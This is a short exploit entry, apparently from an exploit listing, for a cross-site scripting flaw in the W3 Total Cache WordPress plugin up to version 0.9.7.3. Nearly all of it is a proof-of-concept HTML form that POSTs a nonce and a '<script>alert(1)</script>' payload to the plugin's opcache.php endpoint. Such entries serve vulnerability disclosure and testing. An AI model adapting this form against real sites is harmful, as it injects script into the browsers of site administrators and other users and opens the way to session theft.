W3 Total Cache <= 0.9.7.3 – Cross-Site Scripting (XSS)

  exploits
<!DOCTYPE html> <html> <body> <form action="http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php" method="POST"> <input type="text" name="nonce" value="974ca6ad15021a6668e7ae02e1be551c"> <input type="text" name="command" value="<script>alert(1)</script>"> <input type="submit" name=""> </form> </body> </html>